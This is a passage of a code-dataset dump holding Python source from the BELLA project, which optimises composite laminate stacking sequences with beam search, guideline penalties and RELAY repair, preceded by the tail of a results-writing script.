B12_target)/B12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B12 percentage'] = 0\r\n# if B66_target:\r\n# table_result.loc[0 + 1, 'diff B66 percentage']\\\r\n# = 100 * abs((B66K - B66_target)/B66_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B66 percentage'] = 0\r\n# if B16_target:\r\n# table_result.loc[0 + 1, 'diff B16 percentage']\\\r\n# = 100 * abs((B16K - B16_target)/B16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B16 percentage'] = 0\r\n# if B26_target:\r\n# table_result.loc[0 + 1, 'diff B26 percentage']\\\r\n# = 100 * abs((B26K - B26_target)/B26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B26 percentage'] = 0\r\n#\r\n# if D11_target:\r\n# table_result.loc[0 + 1, 'diff D11 percentage']\\\r\n# = 100 * abs((D11K - D11_target)/D11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D11 percentage'] = 0\r\n# if D22_target:\r\n# table_result.loc[0 + 1, 'diff D22 percentage']\\\r\n# = 100 * abs((D22K - D22_target)/D22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D22 percentage'] = 0\r\n# if D12_target:\r\n# table_result.loc[0 + 1, 'diff D12 percentage']\\\r\n# = 100 * abs((D12K - D12_target)/D12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D12 percentage'] = 0\r\n# if D66_target:\r\n# table_result.loc[0 + 1, 'diff D66 percentage']\\\r\n# = 100 * abs((D66K - D66_target)/D66_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D66 percentage'] = 0\r\n# if D16_target:\r\n# table_result.loc[0 + 1, 'diff D16 percentage']\\\r\n# = 100 * abs((D16K - D16_target)/D16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D16 percentage'] = 0\r\n# if D26_target:\r\n# table_result.loc[0 + 1, 'diff D26 percentage']\\\r\n# = 100 * abs((D26K - D26_target)/D26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D26 percentage'] = 0\r\n#\r\n#\r\n#\r\n#\r\n# if A11_target:\r\n# table_result.loc[0 + 2, 'diff A11 percentage']\\\r\n# = 100 * abs((A11 - A11_target)/A11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A11 percentage'] = 0\r\n# if A22_target:\r\n# table_result.loc[0 + 2, 'diff A22 percentage']\\\r\n# = 100 * abs((A22 - A22_target)/A22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A22 percentage'] = 0\r\n# if A12_target:\r\n# table_result.loc[0 + 2, 'diff A12 percentage']\\\r\n# = 100 * abs((A12 - A12_target)/A12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A12 percentage'] = 0\r\n# if A66_target:\r\n# table_result.loc[0 + 2, 'diff A66 percentage']\\\r\n# = 100 * abs((A66 - A66_target)/A66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A66 percentage'] = 0\r\n# if A16_target:\r\n# table_result.loc[0 + 
2, 'diff A16 percentage']\\\r\n# = 100 * abs((A16 - A16_target)/A16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A16 percentage'] = 0\r\n# if A26_target:\r\n# table_result.loc[0 + 2, 'diff A26 percentage']\\\r\n# = 100 * abs((A26 - A26_target)/A26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A26 percentage'] = 0\r\n#\r\n# if B11_target:\r\n# table_result.loc[0 + 2, 'diff B11 percentage']\\\r\n# = 100 * abs((B11 - B11_target)/B11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B11 percentage'] = 0\r\n# if B22_target:\r\n# table_result.loc[0 + 2, 'diff B22 percentage']\\\r\n# = 100 * abs((B22 - B22_target)/B22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B22 percentage'] = 0\r\n# if B12_target:\r\n# table_result.loc[0 + 2, 'diff B12 percentage']\\\r\n# = 100 * abs((B12 - B12_target)/B12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B12 percentage'] = 0\r\n# if B66_target:\r\n# table_result.loc[0 + 2, 'diff B66 percentage']\\\r\n# = 100 * abs((B66 - B66_target)/B66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B66 percentage'] = 0\r\n# if B16_target:\r\n# table_result.loc[0 + 2, 'diff B16 percentage']\\\r\n# = 100 * abs((B16 - B16_target)/B16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B16 percentage'] = 0\r\n# if B26_target:\r\n# table_result.loc[0 + 2, 'diff B26 percentage']\\\r\n# = 100 * abs((B26 - B26_target)/B26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B26 percentage'] = 0\r\n#\r\n# if D11_target:\r\n# table_result.loc[0 + 2, 'diff D11 percentage']\\\r\n# = 100 * abs((D11 - D11_target)/D11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D11 percentage'] = 0\r\n# if D22_target:\r\n# table_result.loc[0 + 2, 'diff D22 percentage']\\\r\n# = 100 * abs((D22 - D22_target)/D22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D22 percentage'] = 0\r\n# if D12_target:\r\n# table_result.loc[0 + 2, 'diff D12 percentage']\\\r\n# = 100 * abs((D12 - D12_target)/D12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D12 percentage'] = 0\r\n# if D66_target:\r\n# table_result.loc[0 + 2, 'diff D66 percentage']\\\r\n# = 100 * abs((D66 - D66_target)/D66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D66 percentage'] = 0\r\n# if D16_target:\r\n# table_result.loc[0 + 2, 'diff D16 percentage']\\\r\n# = 100 * abs((D16 - D16_target)/D16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D16 percentage'] = 0\r\n# if D26_target:\r\n# table_result.loc[0 + 2, 'diff D26 percentage']\\\r\n# = 100 * abs((D26 - D26_target)/D26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D26 percentage'] = 0\r\n\r\n# print(table_result)\r\n\r\n append_df_to_excel(\r\n result_filename, table_result, 'results', index=True, header=True)\r\n\r\n\r\n### Write results in a excell sheet\r\nsave_constraints_LAYLA(result_filename, constraints)\r\nsave_parameters_LAYLA_V02(result_filename, parameters)\r\nsave_materials(result_filename, mat_prop)\r\nautofit_column_widths(result_filename)\r\n\r\n\r\n"
},
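The LAYLA run script stored in the record above fills its twelve lamination-parameter error columns ('index 1' to 'index 12') with one `table_result.loc[...]` assignment per index, repeated for the targets, the Kennedy stacks and the LAYLA stacks. A loop over the indices keeps the same bookkeeping in a few lines; the sketch below assumes a hypothetical helper `lp_error_row` and illustrative data, and is not a LAYLA or BELLA function.

    import numpy as np
    import pandas as pd

    def lp_error_row(lampam_target, lampam, label):
        # one-row DataFrame of absolute lamination-parameter errors,
        # mirroring the 'index 1'..'index 12' columns of the script
        errors = np.abs(np.asarray(lampam_target) - np.asarray(lampam))
        row = {'information': label}
        row.update({f'index {k + 1}': errors[k] for k in range(12)})
        return pd.DataFrame([row])

    lampam_target = np.linspace(-0.2, 0.2, 12)
    print(lp_error_row(lampam_target, np.zeros(12), 'LP errors LAYLA'))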
{
"alpha_fraction": 0.5166283249855042,
"alphanum_fraction": 0.5244004130363464,
"avg_line_length": 42.74477767944336,
"blob_id": "2e6454e6e86ae958e6a4dba24bf4387547ee27fb",
"content_id": "e8fd0325f5bfc47fe183eccb1c851c136eeb73ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29979,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 670,
"path": "/src/BELLA/optimiser_with_one_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nOptimisation of a composite laminate design based on an input py drop layout\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nfrom src.BELLA.results import BELLA_ResultsOnePdl\r\nfrom src.BELLA.objectives import calc_obj_each_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.moments_of_areas import calc_mom_of_areas2\r\nfrom src.BELLA.lampam_matrix import calc_delta_lampams2\r\nfrom src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_ply_counts\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.pruning import pruning_diso_contig_damtol\r\nfrom src.RELAY.repair_mp import repair_mp\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.BELLA.format_pdl import extend_after_guide_based_blending\r\n#from src.divers.pretty_print import print_list_ss\r\n\r\ndef BELLA_optimiser_one_pdl(\r\n multipanel, parameters, obj_func_param, constraints, ply_order,\r\n mom_areas_plus, delta_lampams, pdl, mat=0):\r\n \"Ply angle optimisation with beam search (BELLA step 3)\"\r\n\r\n results = BELLA_ResultsOnePdl()\r\n# print_list_ss(pdl)\r\n\r\n # to normalise the disorientation and contiguity constraints' penalties\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.reduced.panels])\r\n\r\n # ply indices in the order in which plies are optimised\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n\r\n lampam_matrix = calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise)\r\n\r\n (cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas) \\\r\n = calc_mom_of_areas2(\r\n multipanel, constraints, mom_areas_plus, pdl, n_plies_to_optimise)\r\n\r\n # lampam_weightings: lamination parameter weightings at each level of the\r\n # search (used in the objective function calculation)\r\n lampam_weightings = np.zeros(\r\n (n_plies_to_optimise, multipanel.reduced.n_panels, 12))\r\n for ind_ply in range(n_plies_to_optimise):\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n lampam_weightings[ind_ply, ind_panel, 0:4] \\\r\n = panel.lampam_weightings[0:4] \\\r\n * cummul_areas[ind_panel, ind_ply]\r\n\r\n lampam_weightings[ind_ply, ind_panel, 4:8] \\\r\n = panel.lampam_weightings[4:8] \\\r\n * cummul_first_mom_areas[ind_panel, ind_ply]\r\n\r\n lampam_weightings[ind_ply, ind_panel, 8:12] \\\r\n = panel.lampam_weightings[8:12] \\\r\n * cummul_sec_mom_areas[ind_panel, ind_ply]\r\n\r\n if not np.isclose(lampam_weightings[ind_ply, ind_panel],\r\n np.zeros((12,), float)).all():\r\n lampam_weightings[ind_ply, ind_panel] \\\r\n /= np.sum(lampam_weightings[ind_ply, ind_panel])\r\n\r\n # Stacking sequences of the active nodes\r\n ss_bot_tab = [[np.array([], dtype=int) \\\r\n for ii in range(multipanel.reduced.n_panels)]]\r\n if not constraints.sym:\r\n ss_top_tab = [[np.array([], dtype=int) \\\r\n for ii in 
range(multipanel.reduced.n_panels)]]\r\n\r\n # Lamination parameters of the active nodes\r\n lampam_tab = np.zeros((1, multipanel.reduced.n_panels, 12), float)\r\n\r\n # Estimate function values of the active nodes\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n obj_no_constraints_tab = np.zeros((1, multipanel.reduced.n_panels,), float)\r\n\r\n # Ply counts in each fibre orientation of the active nodes\r\n n_plies_per_angle_tab = np.zeros((\r\n 1, multipanel.reduced.n_panels, constraints.n_set_of_angles),\r\n dtype='float16')\r\n\r\n n_obj_func_calls = 0 # Number of objective function calls\r\n\r\n ss_final = []\r\n sst_final = []\r\n pdl_final = []\r\n penalty_diso_final = []\r\n penalty_contig_final = []\r\n penalty_bal_ipo_final = []\r\n penalty_10_final = []\r\n\r\n for level in indices:\r\n# =============================================================================\r\n# preparation of the exploration of a level during beam search #\r\n# =============================================================================\r\n last_level = level == indices[-1]\r\n # print('level in the search tree', level)\r\n\r\n n_nodes = obj_constraints_tab.size\r\n\r\n for node in range(n_nodes):\r\n# =============================================================================\r\n# selection of first active node to be branched #\r\n# =============================================================================\r\n mother_ss_bot = ss_bot_tab.pop(0)\r\n if not constraints.sym:\r\n mother_ss_top = ss_top_tab.pop(0)\r\n\r\n mother_lampam = lampam_tab[0]\r\n\r\n mother_n_plies_per_angle = n_plies_per_angle_tab[0]\r\n\r\n lampam_tab = np.delete(lampam_tab, np.s_[0], axis=0)\r\n\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[0], axis=0)\r\n\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[0], axis=0)\r\n\r\n# print('at the beginning')\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print()\r\n# print('mother_ss_top', mother_ss_top)\r\n\r\n# =============================================================================\r\n# branching #\r\n# =============================================================================\r\n child_ss = np.copy(constraints.set_of_angles)\r\n\r\n# =============================================================================\r\n# pruning for damage tolerance, disorientation and contiguity in guide panel\r\n# =============================================================================\r\n if constraints.sym:\r\n ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot[multipanel.reduced.ind_thick],\r\n level=level,\r\n constraints=constraints,\r\n has_middle_ply=multipanel.has_middle_ply,\r\n n_plies_to_optimise=n_plies_to_optimise)\r\n else:\r\n ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_top=mother_ss_top[multipanel.reduced.ind_thick],\r\n mother_ss_bot=mother_ss_bot[multipanel.reduced.ind_thick],\r\n level=level,\r\n constraints=constraints,\r\n n_plies_to_optimise=n_plies_to_optimise)\r\n if ss is None: # branch totally pruned\r\n continue # go to next step\r\n# print('ss after pruning for design guidelines', ss.T)\r\n\r\n# =============================================================================\r\n# calculation of ply counts #\r\n# =============================================================================\r\n n_plies_per_angle = np.zeros((\r\n ss.size, multipanel.reduced.n_panels,\r\n 
constraints.n_set_of_angles), dtype=float)\r\n for ind_angle in range(ss.size):\r\n n_plies_per_angle[ind_angle] = np.copy(\r\n mother_n_plies_per_angle)\r\n\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n index = constraints.ind_angles_dict[ss[ind_angle]]\r\n if last_level and multipanel.has_middle_ply:\r\n n_plies_per_angle[\r\n ind_angle, ind_panel, index] += 1/2\r\n else:\r\n n_plies_per_angle[\r\n ind_angle, ind_panel, index] += 1\r\n\r\n n_plies_per_angle_tab = np.vstack((\r\n n_plies_per_angle_tab, n_plies_per_angle))\r\n# print('n_plies_per_angle', n_plies_per_angle)\r\n\r\n# =============================================================================\r\n# calculation of lamination parameters #\r\n# =============================================================================\r\n for ind_angle in range(ss.size):\r\n lampam = np.copy(mother_lampam)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n lampam[ind_panel] += lampam_matrix[\r\n ind_panel,\r\n constraints.ind_angles_dict[ss[ind_angle]], level]\r\n lampam_tab = np.vstack(\r\n (lampam_tab,\r\n lampam.reshape(1, multipanel.reduced.n_panels, 12)))\r\n\r\n n_obj_func_calls += 1\r\n\r\n# =============================================================================\r\n# computation of stacking sequences #\r\n# =============================================================================\r\n if constraints.sym:\r\n for ind_angle in range(ss.size):\r\n ss_bot = list(mother_ss_bot)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_bot[ind_panel] = np.hstack((\r\n ss_bot[ind_panel], ss[ind_angle]))\r\n ss_bot_tab.append(ss_bot)\r\n\r\n else:\r\n for ind_angle in range(ss.size):\r\n\r\n ss_top = list(mother_ss_top)\r\n ss_bot = list(mother_ss_bot)\r\n\r\n if level % 2 == 0:\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_bot[ind_panel] = np.hstack((\r\n ss_bot[ind_panel], ss[ind_angle]))\r\n else:\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_top[ind_panel] = np.hstack((\r\n ss[ind_angle], ss_top[ind_panel]))\r\n\r\n ss_top_tab.append(ss_top)\r\n ss_bot_tab.append(ss_bot)\r\n\r\n# print('ss_bot_tab', ss_bot_tab)\r\n# print()\r\n\r\n# =============================================================================\r\n# computation of penalties and objective function values\r\n# =============================================================================\r\n for ind_angle, ind_angle2 \\\r\n in zip(range(-ss.size, 0, 1), range(ss.size)):\r\n\r\n # calulation of the objective/estimate function values\r\n obj_no_constraints = calc_obj_each_panel(\r\n multipanel=multipanel,\r\n lampam=lampam_tab[ind_angle],\r\n mat=mat,\r\n obj_func_param=obj_func_param,\r\n lampam_weightings=lampam_weightings[level])\r\n obj_no_constraints_tab = np.vstack((\r\n obj_no_constraints_tab, obj_no_constraints))\r\n\r\n\r\n # calulation of the penalties for balance\r\n penalty_bal_ipo = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the 10% rule\r\n penalty_10 = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the disorientation rule\r\n penalty_diso = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the contiguity rule\r\n penalty_contig = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the 
estimate/objective functions\r\n obj_constraints = calc_obj_multi_panel(\r\n objective=obj_no_constraints,\r\n actual_panel_weightings=\\\r\n multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=penalty_diso,\r\n penalty_contig=penalty_contig,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n coeff_diso=obj_func_param.coeff_diso,\r\n coeff_contig=obj_func_param.coeff_contig,\r\n coeff_10=obj_func_param.coeff_10,\r\n coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, obj_constraints))\r\n\r\n# print('mother_ss_top', mother_ss_top)\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print('obj_no_constraints', obj_no_constraints)\r\n# print('obj_constraints_tab', obj_constraints_tab)\r\n\r\n# =============================================================================\r\n# local pruning\r\n# =============================================================================\r\n n_local_nodes = ss.size\r\n if last_level:\r\n node_limit = parameters.local_node_limit_final\r\n else:\r\n node_limit = parameters.local_node_limit\r\n n_excess_nodes = n_local_nodes - node_limit\r\n if level != n_plies_to_optimise - 1 and n_excess_nodes > 0:\r\n obj_constraints_tab_to_del = np.copy(\r\n obj_constraints_tab)[-n_local_nodes:]\r\n to_del = []\r\n for counter in range(n_excess_nodes):\r\n ind_max = np.argmax(obj_constraints_tab_to_del)\r\n obj_constraints_tab_to_del[ind_max] = -6666\r\n to_del.append(\r\n ind_max + obj_constraints_tab.size - n_local_nodes)\r\n for ind_del in sorted(to_del, reverse=True):\r\n del ss_bot_tab[ind_del]\r\n if not constraints.sym:\r\n del ss_top_tab[ind_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[to_del], axis=0)\r\n obj_constraints_tab = np.delete(\r\n obj_constraints_tab, np.s_[to_del])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[to_del], axis=0)\r\n\r\n# print('mother_ss_top', mother_ss_top)\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print('len(ss_top_tab)', len(ss_top_tab))\r\n# print('ss after local pruning', ss.T)\r\n# print('obj_constraints_tab', obj_constraints_tab[-ss.size:])\r\n# print('lampam_tab.shape', lampam_tab.shape)\r\n# =============================================================================\r\n# global pruning\r\n# =============================================================================\r\n if obj_constraints_tab.size == 0:\r\n raise Exception(\"\"\"\r\nbeam search with no solutions !\r\n -Constraints too strict or optimiser parameters not allowing for\r\n sufficient design space exploration\"\"\")\r\n if last_level:\r\n node_limit = parameters.global_node_limit_final\r\n else:\r\n node_limit = parameters.global_node_limit\r\n if obj_constraints_tab.size > node_limit:\r\n obj_constraints_tab_to_del = np.copy(obj_constraints_tab)\r\n for counter in range(node_limit):\r\n ind_min = np.argmin(obj_constraints_tab_to_del)\r\n obj_constraints_tab_to_del[ind_min] = 6666\r\n to_keep = obj_constraints_tab_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in enumerate(to_del) if x]\r\n for ind_del in sorted(to_del, reverse=True):\r\n del ss_bot_tab[ind_del]\r\n if not constraints.sym:\r\n del ss_top_tab[ind_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[to_del], axis=0)\r\n obj_constraints_tab = np.delete(\r\n obj_constraints_tab, 
np.s_[to_del])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[to_del], axis=0)\r\n# print('size after global pruning', obj_constraints_tab.size)\r\n\r\n\r\n# =============================================================================\r\n# repair with RELAY\r\n# =============================================================================\r\n for ind_angle in range(obj_constraints_tab.size):\r\n\r\n # generate full stacking\r\n stack = []\r\n if constraints.sym:\r\n for ind_panel, panel \\\r\n in enumerate(multipanel.reduced.panels):\r\n stack.append(np.array((), dtype=int))\r\n stack[ind_panel] = np.hstack((\r\n ss_bot_tab[ind_angle][ind_panel],\r\n np.flip(ss_bot_tab[ind_angle][ind_panel],\r\n axis=0)\r\n )).astype('int16')\r\n\r\n if panel.has_middle_ply:\r\n stack[ind_panel] = np.delete(\r\n stack[ind_panel],\r\n np.s_[panel.middle_ply_index],\r\n axis=0)\r\n\r\n if stack[ind_panel].size != panel.n_plies:\r\n raise Exception(\"Wrong ply count\")\r\n else:\r\n for ind_panel, panel \\\r\n in enumerate(multipanel.reduced.panels):\r\n stack.append(np.array((), dtype=int))\r\n stack[ind_panel] = np.hstack((\r\n ss_bot_tab[ind_angle][ind_panel],\r\n ss_top_tab[ind_angle][ind_panel]\r\n )).astype('int16')\r\n if stack[ind_panel].size != panel.n_plies:\r\n raise Exception(\"Wrong ply count\")\r\n # print('stack', stack)\r\n\r\n # laminate repair with RELAY\r\n results_repair = repair_mp(\r\n multipanel, stack, constraints, parameters,\r\n obj_func_param, reduced_pdl=pdl, mat=mat)\r\n results.n_designs_last_level += 1\r\n # successful repair\r\n if results_repair[0]:\r\n results.n_designs_after_ss_ref_repair += 1\r\n results.n_designs_after_thick_to_thin += 1\r\n results.n_designs_after_thin_to_thick += 1\r\n # repair reference panel unsuccessful\r\n elif results_repair[4] == 1:\r\n pass\r\n # repair thick-to-thin unsuccessful\r\n elif results_repair[4] == 2:\r\n results.n_designs_after_ss_ref_repair += 1\r\n # repair thin-to-thick unsuccessful\r\n else:\r\n results.n_designs_after_ss_ref_repair += 1\r\n results.n_designs_after_thick_to_thin += 1\r\n\r\n # possible changes during repair\r\n lampam_tab[ind_angle] = calc_lampam(\r\n results_repair[1], constraints)\r\n ss_final.append(results_repair[1])\r\n sst_final.append(results_repair[2])\r\n pdl_final.append(results_repair[3])\r\n ply_counts = calc_ply_counts(\r\n multipanel, results_repair[1], constraints)\r\n n_plies_per_angle_tab[ind_angle] = ply_counts\r\n\r\n # penalty for disorientation\r\n n_diso = calc_number_violations_diso_mp(results_repair[1], constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n # penalty for contiguity\r\n n_contig = calc_penalty_contig_mp(results_repair[1], constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n # penalty for 10% rule\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(results_repair[1],\r\n constraints,\r\n LPs=lampam_tab[ind_angle], mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(ply_counts, constraints)\r\n\r\n # penalty for balance\r\n penalty_bal_ipo = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n penalty_diso_final.append(penalty_diso)\r\n penalty_contig_final.append(penalty_contig)\r\n 
penalty_bal_ipo_final.append(penalty_bal_ipo)\r\n            penalty_10_final.append(penalty_10)\r\n\r\n            # calculation of the objective/estimate function values\r\n            if not results_repair[0]:\r\n                obj_no_constraints = 1e10 * np.ones((\r\n                    multipanel.reduced.n_panels,), float)\r\n            else:\r\n                obj_no_constraints = calc_obj_each_panel(\r\n                    multipanel=multipanel,\r\n                    lampam=lampam_tab[ind_angle],\r\n                    mat=mat,\r\n                    obj_func_param=obj_func_param,\r\n                    lampam_weightings=lampam_weightings[level])\r\n            obj_no_constraints_tab[ind_angle] = obj_no_constraints\r\n\r\n            if not (obj_no_constraints != 1e10).all():\r\n                obj_constraints = 1e10\r\n            else:\r\n                obj_constraints = calc_obj_multi_panel(\r\n                    objective=obj_no_constraints,\r\n                    actual_panel_weightings=\\\r\n                    multipanel.reduced.actual_panel_weightings,\r\n                    penalty_diso=penalty_diso,\r\n                    penalty_contig=penalty_contig,\r\n                    penalty_10=penalty_10,\r\n                    penalty_bal_ipo=penalty_bal_ipo,\r\n                    coeff_diso=obj_func_param.coeff_diso,\r\n                    coeff_contig=obj_func_param.coeff_contig,\r\n                    coeff_10=obj_func_param.coeff_10,\r\n                    coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n            obj_constraints_tab[ind_angle] = obj_constraints\r\n\r\n# =============================================================================\r\n#     select best result\r\n# =============================================================================\r\n    ss_bot_tab = np.copy(ss_final)\r\n\r\n    if parameters.save_success_rate:\r\n        to_keep = np.array([ind for ind in range(len(obj_constraints_tab))\\\r\n                            if obj_constraints_tab[ind] < 1e10])\r\n        to_del = np.array([ind for ind in range(len(obj_constraints_tab))\\\r\n                           if ind not in to_keep])\r\n        if to_keep.size:\r\n            ss_final = [ss_final[ind] for ind in to_keep]\r\n            sst_final = [sst_final[ind] for ind in to_keep]\r\n            pdl_final = [pdl_final[ind] for ind in to_keep]\r\n            penalty_diso_final = [penalty_diso_final[ind] for ind in to_keep]\r\n            penalty_contig_final = [\r\n                penalty_contig_final[ind] for ind in to_keep]\r\n            penalty_bal_ipo_final = [\r\n                penalty_bal_ipo_final[ind] for ind in to_keep]\r\n            penalty_10_final = [penalty_10_final[ind] for ind in to_keep]\r\n\r\n        for ind in to_del[::-1]:\r\n            lampam_tab = np.delete(lampam_tab, np.s_[ind], axis=0)\r\n            obj_constraints_tab = np.delete(\r\n                obj_constraints_tab, np.s_[ind], axis=0)\r\n            obj_no_constraints_tab = np.delete(\r\n                obj_no_constraints_tab, np.s_[ind], axis=0)\r\n\r\n        results.n_designs_repaired_unique = np.unique(\r\n            sst_final, axis=0).shape[0]\r\n\r\n    if len(obj_constraints_tab) == 0:\r\n        print('No laminate design solution with this initial ply drop layout')\r\n        return None\r\n\r\n    index = np.argmin(obj_constraints_tab)\r\n    ss = ss_bot_tab[index]\r\n    lampam = lampam_tab[index]\r\n    n_plies_per_angle = n_plies_per_angle_tab[index]\r\n    obj_no_constraints = obj_no_constraints_tab[index]\r\n    obj_constraints = obj_constraints_tab[index]\r\n# =============================================================================\r\n#     Check the results\r\n# =============================================================================\r\n    # test for the ply counts\r\n    for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n        if ss[ind_panel].size != panel.n_plies:\r\n            raise Exception(\"\"\"\r\nWrong ply counts in the laminate.\"\"\")\r\n\r\n    # test for the partial lamination parameters\r\n    ss = list(ss)\r\n    lampam_test = calc_lampam(ss, constraints)\r\n    if not (abs(lampam - lampam_test) < 1e-13).all():\r\n        print_lampam(lampam[0], lampam_test[0])\r\n        print_ss(ss[0])\r\n        raise Exception(\"\"\"\r\nLamination parameters not matching the stacking 
sequences.\"\"\")\r\n\r\n # test for the objective function value\r\n obj_no_constraints_test = calc_obj_each_panel(\r\n multipanel=multipanel,\r\n lampam=lampam,\r\n lampam_weightings=lampam_weightings[level],\r\n mat=mat,\r\n obj_func_param=obj_func_param)\r\n\r\n if abs(obj_no_constraints_test - obj_no_constraints > 1e-10).any():\r\n print('obj_no_constraints_test', obj_no_constraints_test)\r\n print('obj_no_constraints', obj_no_constraints)\r\n raise Exception(\"\"\"\r\nObjective function value not matching the stacking sequences.\"\"\")\r\n\r\n\r\n # disorientaion - penalty used in blending steps 4.2 and 4.3\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n # contiguity - penalty used in blending steps 4.2 and 4.3\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n # 10% rule - no penalty used in blending steps 4.2 and 4.3\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, 